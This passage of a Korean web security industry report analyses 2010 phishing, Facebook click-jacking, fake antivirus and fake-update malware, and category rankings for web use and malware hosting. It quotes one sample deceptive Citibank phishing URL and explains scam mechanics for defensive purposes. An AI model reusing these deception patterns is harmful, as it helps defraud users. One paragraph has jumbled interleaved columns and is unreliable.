보상을 위한 설문조사를 작성하고 마일리지 적립을 위한 신용카드 정보를 제공하도록 요청할 수 있습니다. 사람들이 받는 편지함의 내용에 대한 주의를 강화하고 대형 은행들이 자사의 브랜드에 대한 피싱 사이트를 차단하고 2단계 로그인 방식으로 전환함에 따라 피싱은 진화하고 있습니다. 그로 인해 위의 Zeus 및 통신 사기 단원에서 살펴본 것처럼 사이버 범죄는 피싱 대신 키로거를 첨부한 맬웨어를 전달하여 금융 인증 정보를 수집하는 방식으로 전환되고 있습니다. 고전적인 피싱도 아직 존재하지만, 사이버 범죄는 친구들 간의 신뢰할 수 있는 링크로 사진을 입력하여 맬웨어를 전달하거나 기밀 정보 또는 금융 정보를 피싱하는 소셜 네트워킹 공격으로 전환되었습니다. 올해 초에 사용자 수가 수천만 명에 달하는 bebo.com을 호스팅하는 AOL에 대한 피싱 공격이 발견되었습니다. 이 피싱에서는 AOL 청구 센터에 개인 정보를 보내는 3단계 보안 웹 로그인처럼 보이는 애니메이션을 사용했습니다. 사용자가 접속하면 AOL은 이 정보를 수집하기 위해 을 보내지 않는다는 경고와 함께 개인, 신용 카드, 뱅킹 및 로그인 인증 정보를 수집하는 정교한 웹 페이지가 표시됩니다. 스푸핑된 소셜 네트워킹 사이트와 함께 정부 사이트, 게임 사이트, 소형 금융 기관(예: 신용협동조합) 등을 대상으로 하며 수출 금지품목을 합법적으로 13 < >

15 위장하여 선적하기 위해 DHL 계정 정보를 피싱하는 새로운 방법도 등장했습니다. 지금은 신뢰도를 높이기 위해 금융 피싱에 사용자 인증 팩스 회신이 포함된 경우도 있습니다. 작은 URL에 피싱 도메인을 숨겨서 활성화하는 경우도 있습니다. 피싱 감지 소프트웨어는 HTML 기반 콘텐츠를 검색하므로 일부 공격에서는 플래시, JavaScript 및 MIME 형식의 콘텐츠를 사용하면서 공격의 성공을 위해 브라우저에서 HTML 형식으로 자동으로 교정하는 방법도 사용됩니다. 피싱 공격의 약 75%는 신뢰할 수 있는 해킹된 도메인에 상주합니다. 약 15% 는 무료 호스팅 도메인에 상주하고 나머지는 피싱을 위해 단기적으로 생성된 전용 도메인에 상주합니다. 사이버 범죄에서는 검색 엔진을 사용하여 공격에 취약한 호스팅 소프트웨어를 사용하는 도메인을 주요 해킹 대상으로 검색하여 공격에 활용합니다. 나태한 사이버 범죄자들이 쉽게 이용할 수 있도록 완벽하게 개발된 피싱 키트를 제공하는 트위스트가 있습니다. 하지만, 이러한 키트에는 사이버 범죄자가 훔친 정보를 피싱 키트 작성자에게 다시 전송하는 백도어가 포함되어 있습니다. 맬웨어 감지 수와 비교하여 피싱 공격이 올해에도 2:1로 더 많은 비율을 차지했습니다. 피싱이 지난 해에 감소되는 추세에 있다는 여러 보고가 있었지만 지난 몇 년 동안 나타냈던 최대 성장률에서 조금 벗어난 것에 불과합니다. 대부분의 사람들은 피싱을 SPAM 및 공격과 연관 짓고 있지만, 소셜 네트워킹이 사회 공학적 방식의 웹 기반 피싱 공격의 새로운 장을 열었습니다. 온라인 서비스에 대한 사용자 인증 정보를 수집하기 위한 피싱의 새로운 추세: 사용자들은 우려하지 않을 수도 있지만 사이버 범죄자들은 중요한 금융 및 뱅킹 사이트에서 유사한 사용자 인증 정보가 사용될 가능성이 매우 높다는 사실을 잘 알고 있습니다. 사용자들은 편의를 위해 사이트 간에 공통된 온라인 암호를 사용하는 경향이 있는 데 이는 피해야 할 습관입니다. 소셜 네트워킹, 뉴스 및 참조 사이트를 만들어 다른 사람들에게 도움이 되는 정보를 게시할 수 있습니다. 그러면 사이트에 대한 트래픽이 유도되어 광고 수익을 올리는 데 도움이 됩니다 월드컵 기간 동안 사람들이 PC를 통해 HD로 실시간 중계를 해주는 사이트를 검색할 때 발생했던 사례처럼 이러한 사이트에서도 피싱이 활용됩니다. 여기서는 실시간 스트리밍을 차단하는 항목을 실행하여 사용자들이 아래 예제와 같은 맬웨어 전달 솔루션 또는 아래와 같은 솔루션을 24시간 검색하도록 합니다. 14 < >

16 분석 과정에서 월드컵 경기를 온라인에서 실시간으로 시청하기 위해 사용자 정보를 입력하도록 유도하는 gather.com 사이트가 밝혀졌습니다. 개인이 PC 에서 경기를 실시간으로 시청하기 위해 1주일 동안 소셜 네트워킹의 회원으로 가입하고 매시간 게시물을 올리고 솔루션을 찾는 데 집중합니다. 이 사용자를 신뢰하지 않도록 경고하는 다양한 신호가 사용될 수 있습니다. 아래 그래픽은 이 호스트에서 링크를 누를 때 이동되는 사이트를 보여 줍니다. StreamOnline Magazine(존재하지 않는 회사)에 대한 빨간색 밑줄을 이 피싱 공격에 대한 다른 증거로 유의하십시오. 위의 모든 링크는 동일한 사이트는 아니지만 아래의 동일한 "가입" 페이지로 연결됩니다. 이제 이미 무료로 제공되고 있는 어떤 것을 판매하기 위해 개인 정보와 사용자 결제 정보를 수집하는 가입자/지불 웹 페이지의 알려진 영역으로 돌아왔습니다. 15 < >

17 또한 streamdirect.tv 웹 페이지(첫 번째 그래픽 참조)의 아래쪽으로 끝까지 스크롤해야만 "당사는 인터넷에서 무료로 제공되는 스트림에 쉽게 액세스할 수 있도록 서비스를 제공합니다."라는 메시지가 표시되는 경우도 있었습니다. streamdirect.tv와 signup-gateway.com은 모두 피싱 예: Citibank에 대한 최근 피싱 사이트의 익명 1년 등록을 통해 등록한지 1년도 되지 않은 대규모 URL. 도메인입니다. online.citibank.com.us.jps.portal.index.do.signin. 12월에 Kaspersky Lab은 피싱 공격자들을 확인할 logon.citibank.online.secure.sessionid.udp pincyya 수 있는 상위 10개 장소를 발표했습니다 8 dcjfwjkgporvazebpnejlinbnunptl.qtpycihnqzaepbbw. 목록에는 drgjysgkvvegkvrztfytnffb.cggshinmxvtsmxeesikaeci 위에서부터 Paypal, Ebay, HSBC, Facebook, Google, whyqscvtfbcxjklti.sid.afterthehunttaxidermy.com/ IRS, RAPIDSHARE, Bank of America, UBI(United Bank of India) 및 Bradesco(브라질 4대 은행 중 사용자가 어떻게 이와 같은 대규모 위장 URL을 하나)가 포함되어 있습니다. 금융 사이트는 글로벌 확인할 수 있을까라고 질문할 수 있을 것입니다. 사이트이므로 이해가 되지만 Facebook이 4위에 오른 위의 첫 번째 몇 줄만 보이도록 웹 브라우저에서 것은 피싱 및 온라인 신용 사기가 소셜 네트워킹으로 URL을 잘라낸다는 점을 알면 해당 공격의 독특한 전환되고 있는 추세를 반영합니다. 수법을 인식할 수 있습니다. 16 < >

18 소셜 네트워킹 사회의 1/12을 연결하고 빠르게 성장하고 있는 소셜 네트워킹은 친구들 간에 미끼, 동적 웹 링크 및 피싱 공격에 대해 신뢰할 수 있는 환경을 제공합니다. Facebook과 기타 소셜 네트워킹 사이트들이 웹 통신을 빠르게 변화시키고 있습니다. 소셜 네트워킹은 친구들 간의 신뢰할 수 있는 관계를 통해 사이버 범죄의 새로운 대상이 되고 있습니다. 맬웨어 전달, 잠재적 데이터 유출 및 생산성 하락을 유도하는 동적 링크는 대부분 기업의 주요 관심사입니다. 또한 소셜 네트워킹에서는 1세대 URL 필터링에 적합한 범주가 없으므로 단일 평가 체계로 분류하지 않습니다. 소셜 네트워킹은 대형 웹 내의 웹 에코시스템입니다. 내부에 여러 웹 애플리케이션과 게임이 존재하므로 생산성을 유지하고 데이터 유출을 방지하며 맬웨어 전송과 웹 위협을 차단하기 위해 필터링 및 제어 기능이 필요합니다. 대부분의 기업에서 소셜 네트워킹 애플리케이션을 일괄적으로 차단하지는 않습니다. 미국의 군대에서도 2010년에 군인들이 가족, 친구 및 지인들과 연락할 수 있도록 소셜 네트워킹 액세스를 허용했습니다. 소셜 네트워킹 내의 신뢰할 수 있는 관계와 사진 또는 동영상 보기 미끼를 결합한 동적 링크는 사이버 범죄의 매우 효율적인 대상인 것처럼 보입니다. 신뢰할 수 있는 친구가 친구 동아리에 보낸 "이거 네 사진이니? <link>" 링크는 새로운 시스템을 빠르게 감염시켜서 다른 친구들에게 전파됩니다. 수백 개의 소셜 네트워킹 계정에 대한 액세스 권한을 적은 금액으로 구매하여 사이버 범죄를 통해 큰 수익을 올릴 수 있습니다. Facebook 자체에만 5억 5,000만 명 이상이 75개 언어로 접속하며 그 중 70% 이상이 해외에서 접속합니다. 보고서의 앞부분에서 설명한 것처럼 약 700,000 명의 신규 사용자가 매일 추가되어 Facebook은 인구 수를 기준으로 중국과 인도에 이어 세계 3위에 해당합니다. 다음은 Facebook 인턴 엔지니어인 Paul Bulter 9 가 작성한 친구의 위치를 보여주는 Facebook 친구 차트입니다. 17 < >

19 Facebook 친구 위치 맵 인턴 Paul Butler 9 이 차트는 친구를 시각적으로 표시하고 국가와 행정 구역을 명확하게 보여 줍니다. "문자 그대로 한 번만 클릭하면 닿을 수 있는 작은 세상"이라는 말을 여실하게 증명합니다. 사용자들은 소셜 네트워킹 계정에 거의 매일 로그인하며 여러 온라인 서비스에서 공통된 암호와 ID를 사용합니다. 따라서 소셜 네트워킹 사용자 인증 정보를 캡처하면 뱅킹, 금융 및 기타 온라인 계정에 액세스할 수 있습니다. 사용자들이 동일한 암호를 사용할 가능성이 매우 높기 때문에 금융 계정에 대한 액세스 인증 정보를 사용할 목적으로 관련 없는 온라인 사용자 계정을 공격하는 많은 피싱을 목격합니다. 대부분의 사용자가 금융 계정은 매우 신중하게 관리하지만 소셜 네트워킹 사이트에 대한 일상 로그인은 과속 방지턱 정도로만 간주합니다. 클릭-재킹(Click-jacking)은 소셜 네트워킹 내에서 사용자가 무언가를 "like (원함)"하도록 하여 사용자 영역에 게시하게 함으로써 친구들에게 스팸을 전송하는 다른 방식입니다. 사이버 범죄에서 클릭-재킹(Click-jacking)을 통해 많은 대상에게 빠르게 접근한 후 설문조사를 수행하게 하여 개인 정보를 수집하고 접속을 유도하여 광고 수익을 올리며 설문조사 과정에 필요하지도 않은 동영상과 같은 미끼에 접근하도록 유도할 수 있습니다. 사용자들은 사진이나 동영상을 보기 위해 몇 가지 간단한 테스트를 통해 자신이 CAPTCHA 프로세스와 같은 시스템이 아니라 사람이라는 것을 증명해야 한다는 데에 동의합니다. 실제로 사진을 보기 위해 어떠한 업데이트도 필요하지 않을 뿐만 아니라 소셜 네트워킹 환경에서 그런 동영상이 필요하지도 않습니다. 18 < >

20 설명한 Facebook 클릭-재킹(Click-jacking) 공격은 3단계로 구성됩니다. 사용자가 친구가 추천한 동영상을 마지못해서 보러 가면 파란색, 녹색, 빨간색의 순서로 세 개의 단추를 클릭하라는 간단한 테스트가 표시됩니다. 파란색 단추는 Facebook 페이지에 연결하는 숨김 "like" 요소인 "Five-thingsevery-girl-does-before-she-meets-her-boyfriend- LOL"을 활성화합니다. 즉, 자신도 모르게 이 애플리케이션을 원하는 것으로 됩니다. 녹색 단추는 이 Facebook 페이지를 사용자 영역에 게시하여 사용자가 이 웹 페이지를 "like(좋아요)"하는 것으로 표시합니다. 빨간색 단추는 사이트의 모든 약관에 동의하여 모든 개인 정보를 수집하고 친구에게 스팸을 보내도록 허용하는 것을 의미합니다. 우리의 보안 블로그에 간단한 게시물을 쓰는 동안에 이 클릭-재킹 (Click-jacking) 공격이 1100개의 다른 "like"를 추가했습니다. 이 공격의 변형에서는 여자 친구에 대한 남자 친구의 복수 테마를 사용했습니다. 다음은 "Dislike(싫어요)" 단추가 제공되는 예입니다. 소셜 네트워킹은 사용자의 행동과 세대별 온라인 습관도 변경합니다. 사용자는 콘텐츠를 깊이가 아니라 보다 시각적이고 폭넓게 접하게 됩니다. 19 < >

21 또한 온라인 서비스와 애플리케이션에서 즉각적인 희열을 기대하며 조급해 합니다. 오늘날의 온라인 환경은 멀티태스킹을 중심으로 운영되므로 결여된 집중력, 중독적이고 강박 관념에 사로잡힌 동작, 익명 관계, 일대일로는 하기 힘든 외향적이고 노골적인 말투 등 보다 공격적이고 취약한 태도를 갖게 됩니다. 사이버 범죄에서는 이런 변화하는 사용자 성향과 신세대들이 이러한 점을 경계하지 않는다는 사실을 활용합니다. 여기서 동적 링크를 따르고 웹 위협을 차단하는 실시간 평가 기능을 갖춘 웹 방어 기술이 필요하다는 교훈을 얻게 됩니다. 인맥에는 많은 미끼가 있습니다. 친구가 친구를 신뢰함에 따라 사용자 인증 정보가 시스템을 감염시켜서 손상시킵니다. 따라서 소셜 네트워킹의 웹 애플리케이션은 특정 컨트롤부터 보다 보편적인 기능까지 중첩된 카테고리 평가를 실시해야 합니다. 단일 카테고리 평가 체계를 갖춘 방화벽, AV 및 URL 필터링이 제공할 수 있는 것보다 우수한 완벽한 웹 방어 및 제어 기능이 필요합니다. 기업은 소셜 네트워킹 첨부 파일 및 게시물에 대해 맬웨어 전달 및 데이터 유출을 분석해야 합니다. 보고 및 추세 분석을 통해 소셜 네트워킹을 세부적으로 파악하여 생산성 및 리소스 사용 현황을 검토해야 합니다. 주요 웹 카테고리 사적인 호기심이 관련 업무 중심으로 바뀌고 있습니다. 성인물과 데이트/친구 관련 내용이 비즈니스/경제 웹 요청으로 대체되고 있습니다. 상위 15개 웹 카테고리에 대한 연간 합산 분석에서 최초로 웹 사용에 대한 높은 전망을 제시했습니다. 블루코트는 Blue Coat WebPulse 클라우드 기술을 통합하는 7가지 제품 솔루션이 있습니다. 그 중 6개 제품 솔루션은 실시간 피드백을 제공합니다. 어떤 의미에서 블루코트는 7천만 명이 넘는 사용자의 신규 웹 콘텐츠와 기존 웹 콘텐츠를 실시간으로 분석하는 초대형 웹 진공 청소기를 보유하고 있습니다. 아래 표를 검토하기 전에 한 사용자의 웹 요청 하나가 개의 동적 웹 요청을 생성하여 브라우저 디스플레이를 가득 채우게 된다는 사실을 기억하십시오. 따라서 거의 모든 웹 요청에 광고가 포함되어 있고 대부분의 사이트에 검색 옵션이 있으므로 웹 광고를 최우선으로 평가합니다. 20 < >

22 2010년 합산(약 50주) 상위 15개 웹 카테고리는 다음과 같습니다. 1. 검색 엔진/포털 2. 웹 광고 3. 컴퓨터/인터넷 4. 소셜 네트워킹 5. 콘텐츠 서버 6. 오디오/비디오 클립 7. 뉴스/미디어 8. 쇼핑 9. 참조 10. 개방형/혼합 콘텐츠 11. 비즈니스/경제 12. 채팅/인스턴트 메신저 13. 엔터테인먼트 14. 무형 15. 개인 페이지/블로그 검색 엔진과 웹 광고는 예상한 대로 상위로 평가되었지만 소셜 네트워킹이 4위로 떨어졌습니다. 데이트/친구, 포르노, 성인물 및 포르노 사이트와 연관된 불법적/문제 사이트에 대한 많은 반대가 있었습니다. 사적인 호기심은 비즈니스/경제와 같은 보다 비즈니스 중심적인 웹 용도로 대체되었으며 참조 사이트는 상위 순위에 진입했습니다. 국가, 지역 또는 지리적 위치별 글로벌 경제와 재정적 과제를 고려할 때 놀라운 사실도 아닙니다. 사용자들이 이러한 솔루션을 사용하여 소셜 네트워킹, 트위트, 성인물 등과 같은 많은 시간을 소비하는 웹 습관을 제어하기 때문에 자동화 강박 관념 제어가 지금 뉴스에 회자되고 있습니다. 알코올 중독이나 약물 중독과 마찬가지로 지나친 기술 의존적 습관으로 인해 이혼했다는 말을 듣는 것도 어렵지 않습니다. 사람들은 다른 사람들을 조사하여 그들의 생활, 드라마, 활동 등을 추적하는 것을 좋아하지만 특정 시점에는 본업으로 돌아가야 합니다. 21 < >

23 지난 해에는 웹 메일 사용에 분명한 반대가 있었지만 올해에는 웹 메일이 17위에 계속 올랐습니다. 이는 사이버 범죄가 스팸 및 동적 웹 링크가 첨부된 미끼 등과 같이 성공 확률이 낮은 방식에서 소셜 네트워킹으로 전환되고 있는 것과 연관이 있습니다. 친구의 사진에 대한 동적 웹 링크와 관련한 위험성 인식도 높아졌습니다. 이번 연도에 대한 웹 카테고리 요청 추적을 통해 웹 사용 현황을 분석했지만, 웹에서 소비하는 시간을 추적하는 다른 조사와 비교해 보면 몇 가지 공통된 사실도 있지만 대체적으로 다른 결과를 나타냅니다. 시간 사용에 대한 아래의 보고서는 전 세계의 한 지역을 대상으로 하며 Blue Coat Systems의 보고서 이전 연도와 이 보고서 연도가 반반씩 교차되어 있는 중간 연도 분석입니다. Nielsen NetView 2010년 6월 결과10에서는 미국인들이 컴퓨터 사용 시간 중 약 1/4을 소셜 네트워킹을 사용하는 데 소비하며 이는 인스턴트 메신저, 블로그 및 을 포함할 경우 1/3을 초과합니다. 소셜 네트워킹은 온라인에서 소비하는 시간 중 연간 약 43%를 차지하여 게임 및 비디오/ 동영상과 함께 그 수치가 증가했습니다. 은 온라인 시간의 9% 미만으로 연간 28% 감소했습니다. 인스턴트 메신저와 포털 또한 연간 사용률이 두 자리수로 감소했습니다. 모바일 장치에서는 연간 28% 증가하여 사용자 온라인 사용량의 10% 이상을 차지한 소셜 네트워킹의 성장에 힘입어 온라인 시간의 40% 이상을 이 차지했습니다. 포털은 연간 20% 이상 상승한 음악 및 비디오/동영상의 가파른 성장에 힘입어 모바일 장치 부문에서 2위를 차지했습니다. 모바일 장치의 결과가 데스크톱이나 랩톱에서도 이어지지는 않습니다. 하지만 몇 가지 주요 추세가 소셜 네트워킹 및 비디오/동영상에서도 나타나기 시작했습니다. 22 < >

24 이러한 결과로 소셜 네트워킹을 최상위 웹 카테고리로 평가하여 웹 메일 사용에서 많은 감소가 있었습니다. Nielsen 결과는 데스크톱의 경우 회사 을 제외한 웹 메일만 반영하지만 온라인 시간을 측정할 때는 모바일에서의 회사 또는 비즈니스 관련 을 포함하는 것 같습니다. 소셜 네트워킹의 주요 카테고리 소셜 네트워킹은 새로운 온라인 통신 플랫폼으로 많은 성인물이 포함되어 있는 반면에 Facebook은 많은 게임 등급물을 포함하고 있습니다. 이제 소셜 네트워킹은 사회의 1/12을 연결하여 인구를 기준으로 세계에서 세 번째로 큰 국가가 되었습니다. 올해의 웹 보안 보고서에서는 소셜 네트워킹에서 가장 요청이 많은 15개 카테고리와 특히 소셜 네트워킹 및 Facebook 평가를 기준으로 상위 범주를 검토했습니다. 23 < >

25 웹 요청을 기준으로 한 상위 15개 카테고리와 소셜 네트워킹 평가는 다음과 같습니다. 1. 콘텐츠 서버 2. 개인 페이지/블로그 3. 채팅/인스턴트 메신저 미디어 공유 6. 온라인 게임 7. 엔터테인먼트 8. 개방형/혼합 콘텐츠 9. 검색 엔진/포털 10. 뉴스그룹/포럼 11. 비즈니스/경제 12. LGBT(동성연애자) 13. 친구/데이트 14. 소프트웨어 다운로드 15. 오디오/비디오 클립 웹의 콘텐츠가 중첩되므로 블루코트는 각 웹 요청에 대해 다양한 평가를 제공합니다. 예를 들어 소셜 네트워킹 환경에서 단일 카테고리 평가는 가시성 및 추세에 대한 세부적인 정책 제어와 보고를 제한합니다. 위의 표를 네트워크 및 사용자의 개별 고객에게 제공할 수 있습니다. 예상한 대로 소셜 네트워킹은 개인 블로그, 채팅/IM, 및 미디어 공유를 위한 새로운 통신 플랫폼입니다. 하지만 남녀노소가 즐기는 게임을 소개하면서 관련 사기와 웹 위협을 전송하기도 합니다. 전체 웹 요청 중에 가장 요청이 많은 웹 카테고리로서 작년에 비해 포르노와 성인 콘텐츠가 차지하는 비율이 적어졌다는 점이 달라졌습니다. 카테고리 별 소비자 웹 사용 및 소셜 네트워킹에 대해 보다 소비자 중심적인 전망을 내놓기 위해 이 보고서에서는 소비자와 개인 사용자를 보호하는 무료 제품 솔루션인 K9 Web Protection에 관한 부록을 추가했습니다. 소셜 네트워킹을 조사하는 다른 방법은 웹 요청 대신 특정 웹 콘텐츠 평가를 활용하는 것입니다. 이 방법에서는 콘텐츠에 대한 사용자 요청을 기준으로 소셜 네트워킹 사이트에 있는 콘텐츠의 종류와 범위를 파악합니다. 실시간 동적 평가와 담당자의 직접 입력을 통해 실시간 평가 데이터베이스를 업데이트합니다. 24 < >

26 다음 표는 소셜 네트워킹에서 평가 점수를 기준으로 상위에 분류된 카테고리를 보여줍니다. 1. 교육 2. 성인 콘텐츠 3. 여행 4. 온라인 게임 5. 엔터테인먼트 6. 사회/일상 생활 7. 비즈니스/경제 8. 레스토랑/식사/식품 9. 오디오/비디오 클립 10. 개인 페이지/블로그 교육 콘텐츠가 목록의 맨 위에 표시된 사실에 놀랄 수도 있겠지만, 소셜 네트워킹에서 활동하는 동문회 그룹을 고려하면 수긍이 될 것입니다. 또한 성인 콘텐츠가 소셜 네트워킹 환경에 포함되어 2위로 평가된 것은 놀랄 일도 아닙니다. 나머지도 소셜 네트워킹 콘텐츠에 대한 예상 카테고리를 벗어나지 않습니다. Facebook에서 상위 평가 카테고리를 살펴보면 그림이 아래 표와 같이 변경됩니다. 1. 온라인 게임 2. 사회/일상 생활 3. 엔터테인먼트 4. 웹 애플리케이션 5. 스포츠/레크리에이션 6. 성인 콘텐츠 7. 친구/데이트 8. 대안 영성/신앙 9. 종교 10. 채팅/인스턴트 메신저 상위 10개 중 6개 카테고리가 전체 소셜 네트워킹 관련 콘텐츠 평가의 상위 10개 카테고리에 포함되지 않은 내용입니다. 여기서는 웹 상의 가장 큰 소셜 네트워킹 솔루션에 대해 완전히 다르게 전망하고 있습니다. 교육이 Facebook 25 < >

27 차트에서 14위로 떨어지고 온라인 게임이 1위에 올랐을 뿐만 아니라 스포츠와 종교 콘텐츠가 차트에 진입했습니다. 올해의 전체 웹 사용 추세를 반영하여 성인 콘텐츠가 Facebook 평가에서도 순위가 하락했습니다. 맬웨어를 호스팅하는 주요 카테고리 신뢰할 수 있는 사이트와 카테고리 평가를 주요 해킹 대상 사이트에 이동하는 것이 맬웨어 전송 인프라 호스팅의 주요 논제였습니다. 웹 브라우저에서 표시할 웹 콘텐츠를 투명하게 집계하기 때문에 사용자에게는 표시되지 않을 수도 있는 여러 웹 특성을 넘나드는 동적 웹 링크가 웹 위협 전파시 활용됩니다. 웹 필터링은 맬웨어 전송, 콜-홈 시도, 사기 및 피싱을 차단하는 주요 방어막을 나타냅니다. 지난 해에 발표된 보고서에서는 온라인 저장소, 소프트웨어 다운로드, 포르노, 개방형/혼합 콘텐츠 및 해킹 카테고리가 맬웨어 전송 부문의 상위를 차지했습니다. 이번 연도에는 맬웨어를 호스팅하는 상위 20개 카테고리로 분석 범위를 확장하고 연도별 비교를 통해 추세를 추적했습니다. 평가 점수에 따른 상위 20개 맬웨어 호스팅 카테고리는 다음과 같습니다. 1. 의심 사이트 2. 온라인 저장소 3. 포르노 4. 컴퓨터/인터넷 5. 검색 엔진/포털 6. 개방형/혼합 콘텐츠 7. 친구/데이트 8. 웹 호스팅 9. 소프트웨어 다운로드 10. 피싱 11. 엔터테인먼트 12. 비즈니스/경제 13. 플레이스홀더 14. 오디오/비디오 클립 15.온라인 게임 16.웹 광고 17.쇼핑 18. 해킹 19. P2P(Peer-To-Peer) 20. 도박 26 < >

28 의심 사이트는 웹 위협 전송과 관련한 신뢰 사이트 평가 및 웹 분석에서 신뢰도 평가가 낮은, 혼란스러운 활성 스크립트와 콘텐츠를 포함하는 사이트와 연관이 있기 때문에 상위 카테고리로 평가되었습니다. 포르노가 3위에 오른 것은 놀라운 일이 아니지만 웹 위협과 연관성이 높은 해킹과 도박이 낮은 평가를 받았습니다. 또한 WebPulse에서는 전세계에서 매일 새로 생겨나는 포르노 웹 사이트를 평균 110,000개 이상씩 평가하며, 포르노 사이트의 웹 위협에 대한 높은 상관 관계와 지속적인 생성으로 인해 실시간 평가에서 웹 방어의 최우선 순위로 평가되었습니다. 연도별 분석을 통해 확인된 맬웨어 전송 증가율 기준 상위 5개 범주에서 개방형/ 혼합 콘텐츠(29% 증가)가 1위를 차지하고, 온라인 저장소와 콘텐츠 서버(모두 13% 증가)가 공동 2위를 차지했으며, 오디오/비디오 클립 부문이 근소한 차이로 뒤를 이었습니다. 마지막으로 해킹이 5위를 차지한 것은 놀랄 일도 아닙니다. 동적 DNS, 소프트웨어 다운로드 및 인사말 카드는 하향 추세에 있습니다. 지난 해에는 사이버 범죄가 무료 도메인에서 신뢰성이 좋은 알려진 사이트로 이동하여 해킹을 통해 공격 인프라를 게시하는 새로운 경향이 나타났습니다. 드물게 전체 공격 인프라를 한 곳에 모두 게시하는 경우도 있습니다. 따라서 웹마스터는 사용자 인증 정보와 웹 사이트의 콘텐츠에 대한 경계를 강화해야 합니다. 지난 8월 말에 콘텐츠를 검사할 수 있도록 잠금 해제된 악성 웹 사이트를 우연히 발견했습니다. 여기에는 FTP 로그인/암호/도메인 정보가 들어 있는 다음과 같은 네 개의.txt 파일이 포함되어 있었습니다. -> servage.net 도메인(185,000개 이상의 사이트를 호스팅하고 있다고 주장하는 대형 웹 호스트)에 대한 1905개 로그인/암호 콤보 -> 주로 narod.ru 도메인과 관련이 있지만 러시아, 폴란드, 우크라이나의 기타 여러 웹 호스트 사이트에 대한 197개 로그인/암호 콤보 -> 모든 종류의 도메인에 대한 77,724개 로그인/암호 콤보(여러 중복 항목을 제외하면 실제 개수는 더 적음) -> 다른 혼합된 일괄 도메인에 대한 21,136개 로그인/암호 콤보 다행히도 간단한 단어와 숫자로만 조합되어 확인하기 쉬운 암호는 소수에 불과하고 대부분의 암호가 복잡했습니다. 39자리 숫자로 된 암호도 있었습니다. 하지만 불행히도 암호가 아무리 복잡하더라도 키 로깅 프로그램을 사용하여 캡처할 수 있습니다. 분명한 것은 공격자가 위의 사용자 인증 정보를 모니터링하여 기록하기 위해 네트워크 또는 컴퓨터에 액세스했다는 사실입니다. 위의 표에서 살펴본 것처럼 맬웨어 호스팅 도메인이 신뢰할 수 있는 도메인으로 전환되는 추세에 있습니다. 27 < >

29 주요 웹 공격 검색 엔진에서 상위 검색 결과 목록에 포함되는 인기 주제에 관한 링크 팜을 통해 제공하는 허위 바이러스 백신과 소프트웨어 업데이트가 악성 광고 공격을 통해 지속적으로 전송하여 웹 평가 순위를 상승시키고 있습니다. 블루코드 연구소에 따르면 허위 바이러스 백신 제공이라는 명목은 몇 년 동안 계속 설득력이 있어 목록의 맨 위에 올라 있습니다. 2위는 허위 업데이트이며 가장 일반적인 형식으로는 동영상이나 리치 미디어를 보는 데 필요한 허위 비디오 코덱이 있습니다. 3위는 사용자 시스템의 약점을 분석하여 특정 맬웨어를 전송시키는 익스플로이트 키트나 허위 바이러스 백신을 제공하는 악성 광고가 차지했습니다. 방어막으로부터 보다 효율적으로 숨기 위한 노력으로 무료 도메인에서 유명한 도메인이 있는 해킹된 사이트로 공격 대상이 전환되고 있기 때문에 맬웨어를 전송하기 위한 SEO(검색 엔진 최적화) 및 링크 팜으로 관심이 옮겨가고 있습니다. Google 보안 팀에서 허위 바이러스 백신의 배포와 관련하여 13개월 동안 실시한 조사 보고서를 2010년 4월 말에 발표했습니다.7 이 조사에 따르면 허위 바이러스 백신이 웹 상에서 발견되는 모든 맬웨어의 15%를 차지한다고 합니다. 허위 바이러스 백신은 인기 검색어를 포함하는 도메인에서 발견되는 맬웨어의 60%를 차지하며, 악성 광고를 통해 전파되는 맬웨어의 50%가 허위 바이러스 백신입니다. 2억 4천만 개의 샘플 웹 페이지 중에서 약 11,000 개의 도메인에 허위 바이러스 백신이 배포되어 있었습니다. 실제로 2010년은 Adobe, Apple 및 Microsoft의 보안 취약성이 드러나서 허위 또는 실제 보안 보호에 대한 사용자의 인식이 높아진 한 해였습니다. 사용자들은 허위 바이러스 백신을 다운받아야 할 상황이거나 사회 공학적 방식을 통해 시스템이 감염되어 도움이 필요할 경우 거의 99%가 문제 해결을 위해 동의를 클릭하고 요금을 지불한 후 허위 바이러스 백신을 설치합니다. 공급업체 B의 소프트웨어를 통해 공급업체 A의 소프트웨어를 제거하여 문제를 해결하려고 하는 사용자를 빼내는 방법이 일반적인 방식입니다. 예를 들어 사용자를 감염시킨 후 보상금을 요구한 후 랜섬웨어 정리 도구를 제공하는 랜섬웨어와 공포를 조장하는 스케어웨어(예: 허위 바이러스 백신) 를 함께 사용하는 경우입니다. 일본에서 있었던 매우 창의적인 사례의 하나로 랜섬웨어가 성인 게임용 파일 공유 서버에 배포되어 비용을 지불하지 않을 경우 사용자의 ID 정보를 공개 웹 사이트에 게시하겠다고 협박했습니다. 28 < >

30 주로 허위 비디오 코덱이나 소프트웨어 업데이트를 통해 실행되는 허위 업데이트는 친구들 간의 소셜 네트워킹 및 공유 사진/비디오를 비롯하여 성인물이나 포르노물에 대한 검색과 연관됩니다. 사이버 범죄자가 소셜 네트워킹 계정에 침투하여 사용자의 모든 친구에게 단문 메시지와 링크 (예: 이거 네 사진이니? <link>)를 보냅니다. 이 동적 링크는 사진을 표시할 것으로 기대하지만 실제로는 사진을 보려면 소프트웨어를 업데이트하도록 요구합니다. 참을성이 없는 멀티태스킹 사용자가 계속 진행하여 친구의 사진을 보기 위해 업데이트 대화 상자를 클릭하면 맬웨어 전송이 완료됩니다. 비디오와 다른 형태의 리치 미디어도 동일한 방법으로 사용됩니다. 지난 해의 보고서와 마찬가지로 성인 또는 포르노 콘텐츠 검색은 사용자가 클릭한 업데이트에 맬웨어를 숨겨서 제공하므로 허위 업데이트와 높은 상관 관계를 나타냈습니다. 해킹 검색도 허위 업데이트 및 맬웨어 전송에 자주 이용되었습니다. 위에서 설명한 것처럼 감지되지 않기 위해 무료 호스팅 사이트를 지양하고 평판이 좋은 해킹된 도메인을 활용하는 새로운 경향이 나타났습니다. 사이버 범죄 웹 인프라의 대부분이 해킹된 평판이 좋은 도메인을 통해 감지되지 않고 전송됩니다. 이러한 전환 시나리오에서 평판 기준의 평가에 따른 방어는 어려움에 직면합니다. 이제는 신뢰할 수 있는 사이트가 맬웨어 전송을 위한 동적 링크 체인에 포함되어 있습니다. 예를 들어, 해킹된 사이트에서 링크 팜에 의해 검색 엔진을 통해 시작되어 감염시키는 허위 바이러스 백신 캠페인을 추적했습니다. 페이지 이름에 검색어가 포함되어 있었으며 대부분 포르노물과 관련이 있었습니다. 맬웨어 서버는 애니메이션으로 작성된 허위 검색 그래픽과 플래시 기반 애니메이션을 모두 제공했습니다. 첫 번째 